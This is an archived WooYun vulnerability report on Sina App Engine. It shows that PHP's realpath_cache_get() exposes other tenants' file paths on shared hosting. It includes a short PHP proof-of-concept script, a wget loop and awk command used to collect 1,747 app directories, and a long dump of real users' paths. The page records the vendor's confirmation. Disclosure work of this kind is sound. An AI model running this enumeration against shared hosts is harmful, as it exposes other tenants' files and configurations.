当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086743

漏洞标题:新浪sae可遍历所有PHP沙盒用户目录文件(分分钟遍历1747个)

相关厂商:新浪

漏洞作者: boooooom

提交时间:2014-12-11 08:54

修复时间:2015-01-25 08:56

公开时间:2015-01-25 08:56

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-11: 细节已通知厂商并且等待厂商处理中
2014-12-11: 厂商已经确认,细节仅向厂商公开
2014-12-21: 细节向核心白帽子及相关领域专家公开
2014-12-31: 细节向普通白帽子公开
2015-01-10: 细节向实习白帽子公开
2015-01-25: 细节向公众公开

简要描述:

RT

详细说明:

PHP有个函数叫realpath_cache_get(),可获取目前cache中的文件的绝对路径,而sae的用户应用命名和绝对路径是有关系的,比如/data1/www/htdocs/612/bzbkorg/1/system/Zend/Cache.php 的应用名称是bzbkorg,网站是http://bzbkorg.sinaapp.com/

漏洞证明:

利用这个函数读取cache中的文件列表
cache.php

foreach (array_keys(realpath_cache_get()) as $values){
echo $values."<br/>";
}


再来
for i in `seq 1 950`;do wget "http://xxx.sinaapp.com/list.php" -O sae.$i.txt;done
汇总去重,获取/data1/www/htdocs/[0-9]+

[root@wocao sina]#cat sae.list |awk -F '/' '{print $1"/"$2"/"$3"/"$4"/"$5}'|uniq|wc -l
1747


分分钟这么多
给点示例

sae.jpg


/data1/www/htdocs/130/tujianwu/1/wp-includes/default-widgets.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/deprecated.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/feed.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/formatting.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/functions.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/functions.wp-scripts.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/functions.wp-styles.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/general-template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/http.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/kses.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/l10n.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/link-template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/load.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/locale.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/media.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/meta.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/nav-menu.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/nav-menu-template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/option.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pluggable-deprecated.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pluggable.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/plugin.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pomo
/data1/www/htdocs/130/tujianwu/1/wp-includes/pomo/entry.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pomo/mo.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pomo/streams.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/pomo/translations.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/post-formats.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/post.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/post-template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/post-thumbnail-template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/query.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/revision.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/rewrite.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/script-loader.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/shortcodes.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/taxonomy.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/template-loader.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/template.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/theme.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/update.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/user.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/vars.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/version.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/widgets.php
/data1/www/htdocs/130/tujianwu/1/wp-includes/wp-db.php
/data1/www/htdocs/130/tujianwu/1/wp-load.php
/data1/www/htdocs/130/tujianwu/1/wp-settings.php
/data1/www/htdocs/131
/data1/www/htdocs/131/baidupost
/data1/www/htdocs/131/baidupost/1
/data1/www/htdocs/131/baidupost/1/index.php
/data1/www/htdocs/131/baidupost/1/plugins
/data1/www/htdocs/131/baidupost/1/./plugins
/data1/www/htdocs/131/baidupost/1/./plugins/cloud_stat
/data1/www/htdocs/131/baidupost/1/plugins/cloud_stat
/data1/www/htdocs/131/baidupost/1/./plugins/cloud_stat/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/cloud_stat/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/debug_info
/data1/www/htdocs/131/baidupost/1/plugins/debug_info
/data1/www/htdocs/131/baidupost/1/./plugins/debug_info/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/debug_info/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/stat
/data1/www/htdocs/131/baidupost/1/plugins/stat
/data1/www/htdocs/131/baidupost/1/./plugins/stat/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/stat/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/x_meizi
/data1/www/htdocs/131/baidupost/1/plugins/x_meizi
/data1/www/htdocs/131/baidupost/1/./plugins/x_meizi/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/x_meizi/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/xxx_post
/data1/www/htdocs/131/baidupost/1/plugins/xxx_post
/data1/www/htdocs/131/baidupost/1/./plugins/xxx_post/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/xxx_post/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/zw_blockid
/data1/www/htdocs/131/baidupost/1/plugins/zw_blockid
/data1/www/htdocs/131/baidupost/1/./plugins/zw_blockid/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/zw_blockid/plugin.class.php
/data1/www/htdocs/131/baidupost/1/./plugins/zw_client_api
/data1/www/htdocs/131/baidupost/1/plugins/zw_client_api
/data1/www/htdocs/131/baidupost/1/./plugins/zw_client_api/plugin.class.php
/data1/www/htdocs/131/baidupost/1/plugins/zw_client_api/plugin.class.php
/data1/www/htdocs/131/baidupost/1/system
/data1/www/htdocs/131/baidupost/1/./system
/data1/www/htdocs/131/baidupost/1/system/class
/data1/www/htdocs/131/baidupost/1/system/./class
/data1/www/htdocs/131/baidupost/1/system/class/cache.php
/data1/www/htdocs/131/baidupost/1/system/class/cloud.php
/data1/www/htdocs/131/baidupost/1/system/class/core.php
/data1/www/htdocs/131/baidupost/1/system/class/db.php
/data1/www/htdocs/131/baidupost/1/system/./class/error.php
/data1/www/htdocs/131/baidupost/1/system/class/error.php
/data1/www/htdocs/131/baidupost/1/system/class/hook.php
/data1/www/htdocs/131/baidupost/1/system/class/plugin.php
/data1/www/htdocs/131/baidupost/1/system/class/updater.php
/data1/www/htdocs/131/baidupost/1/./system/common.inc.php
/data1/www/htdocs/131/baidupost/1/system/common.inc.php
/data1/www/htdocs/131/baidupost/1/system/function
/data1/www/htdocs/131/baidupost/1/system/./function
/data1/www/htdocs/131/baidupost/1/system/./function/core.php
/data1/www/htdocs/131/baidupost/1/system/function/core.php
/data1/www/htdocs/131/baidupost/1/system/./function/sae.php
/data1/www/htdocs/131/baidupost/1/system/function/sae.php
/data1/www/htdocs/131/baidupost/1/template
/data1/www/htdocs/131/baidupost/1/./template
/data1/www/htdocs/132
/data1/www/htdocs/132/duusu
/data1/www/htdocs/132/duusu/1
/data1/www/htdocs/132/duusu/1/config
/data1/www/htdocs/132/duusu/1/./config
/data1/www/htdocs/132/duusu/1/./config/config_global.php
/data1/www/htdocs/132/duusu/1/config/config_global.php
/data1/www/htdocs/132/duusu/1/data
/data1/www/htdocs/132/duusu/1/home.php
/data1/www/htdocs/132/duusu/1/source
/data1/www/htdocs/132/duusu/1//source
/data1/www/htdocs/132/duusu/1/./source
/data1/www/htdocs/132/duusu/1//source//class
/data1/www/htdocs/132/duusu/1/./source/class
/data1/www/htdocs/132/duusu/1/source/class
/data1/www/htdocs/132/duusu/1/./source/class/class_core.php
/data1/www/htdocs/132/duusu/1/source/class/class_core.php
/data1/www/htdocs/132/duusu/1//source//class/class_credit.php
/data1/www/htdocs/132/duusu/1//source//class/class_memcache.php
/data1/www/htdocs/132/duusu/1/source/class/class_memcache.php
/data1/www/htdocs/132/duusu/1//source//class/class_mysql_slave.php
/data1/www/htdocs/132/duusu/1/source/class/class_mysql_slave.php
/data1/www/htdocs/132/duusu/1//source//function
/data1/www/htdocs/132/duusu/1/./source/function
/data1/www/htdocs/132/duusu/1/source/function
/data1/www/htdocs/132/duusu/1/source/function/cache
/data1/www/htdocs/132/duusu/1/source/function/cache/cache_heats.php
/data1/www/htdocs/132/duusu/1/source/function/function_cache.php
/data1/www/htdocs/132/duusu/1/source/function/function_cloud.php
/data1/www/htdocs/132/duusu/1/source/function/function_connect.php
/data1/www/htdocs/132/duusu/1/source/function/function_core.php
/data1/www/htdocs/132/duusu/1/./source/function/function_forum.php
/data1/www/htdocs/132/duusu/1/source/function/function_home.php
/data1/www/htdocs/132/duusu/1/source/function/function_post.php
/data1/www/htdocs/132/duusu/1/./source/language
/data1/www/htdocs/132/duusu/1/source/language
/data1/www/htdocs/132/duusu/1/source/language/lang_action.php
/data1/www/htdocs/132/duusu/1/./source/language/lang_core.php
/data1/www/htdocs/132/duusu/1/source/language/lang_core.php
/data1/www/htdocs/132/duusu/1/./source/module
/data1/www/htdocs/132/duusu/1/source/module
/data1/www/htdocs/132/duusu/1//source/module/home
/data1/www/htdocs/132/duusu/1/./source/plugin
/data1/www/htdocs/132/duusu/1/source/plugin
/data1/www/htdocs/132/duusu/1/./source/plugin/cloudsearch
/data1/www/htdocs/132/duusu/1/source/plugin/cloudsearch
/data1/www/htdocs/132/duusu/1/./source/plugin/cloudstat
/data1/www/htdocs/132/duusu/1/source/plugin/cloudstat
/data1/www/htdocs/132/duusu/1/./source/plugin/cloudstat/cloudstat.class.php
/data1/www/htdocs/132/duusu/1/source/plugin/cloudstat/cloudstat.class.php
/data1/www/htdocs/132/duusu/1/source/plugin/mo_qqgroup_dzx
/data1/www/htdocs/132/duusu/1/source/plugin/mo_qqgroup_dzx/mo_qqgroup_dzx.class.php
/data1/www/htdocs/132/duusu/1/./source/plugin/qqconnect
/data1/www/htdocs/132/duusu/1/source/plugin/qqconnect
/data1/www/htdocs/132/duusu/1/./source/plugin/qqconnect/connect.class.php
/data1/www/htdocs/132/duusu/1/source/plugin/qqconnect/connect.class.php
/data1/www/htdocs/132/duusu/1/source/plugin/qqconnect/template
/data1/www/htdocs/132/duusu/1/./source/plugin/qqconnect/template/module.htm
/data1/www/htdocs/132/duusu/1/./source/plugin/soso_smilies
/data1/www/htdocs/132/duusu/1/source/plugin/soso_smilies
/data1/www/htdocs/132/duusu/1/source/plugin/soso_smilies/soso.class.php
/data1/www/htdocs/132/duusu/1/template
/data1/www/htdocs/132/duusu/1/./template
/data1/www/htdocs/132/duusu/1/./template/default
/data1/www/htdocs/132/duusu/1/template/default
/data1/www/htdocs/132/duusu/1/template/default/common
/data1/www/htdocs/132/duusu/1/template/default/member
/data1/www/htdocs/132/duusu/1/uc_client
/data1/www/htdocs/132/duusu/1/uc_client/control
/data1/www/htdocs/132/duusu/1/uc_client/data
/data1/www/htdocs/133
/data1/www/htdocs/133/animemaster
/data1/www/htdocs/133/animemaster/1
/data1/www/htdocs/133/animemaster/1/api_album.php
/data1/www/htdocs/133/animemaster/1/api_photo.php
/data1/www/htdocs/133/chenghuajie
/data1/www/htdocs/133/chenghuajie/1
/data1/www/htdocs/133/chenghuajie/1/index.php
/data1/www/htdocs/134
/data1/www/htdocs/134/1076862106
/data1/www/htdocs/134/1076862106/1
/data1/www/htdocs/134/1076862106/1/qq.php
/data1/www/htdocs/137
/data1/www/htdocs/137/zybsc
/data1/www/htdocs/137/zybsc/1
/data1/www/htdocs/137/zybsc/1/wp-content
/data1/www/htdocs/137/zybsc/1/wp-content/languages
/data1/www/htdocs/137/zybsc/1/wp-content/languages/zh_CN.php
/data1/www/htdocs/137/zybsc/1/wp-content/plugins
/data1/www/htdocs/137/zybsc/1/wp-content/plugins/smooth-slider
/data1/www/htdocs/137/zybsc/1/wp-content/plugins/smooth-slider/settings
/data1/www/htdocs/137/zybsc/1/wp-content/plugins/smooth-slider/slider_versi

修复方案:

你们那么厉害,肯定知道

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-12-11 14:33

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-12 17:12 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    沙盒绕过牛

  2. 2015-01-03 01:57 | by:小雨 ( 普通白帽子 | Rank:138 漏洞数:64 )

    学习了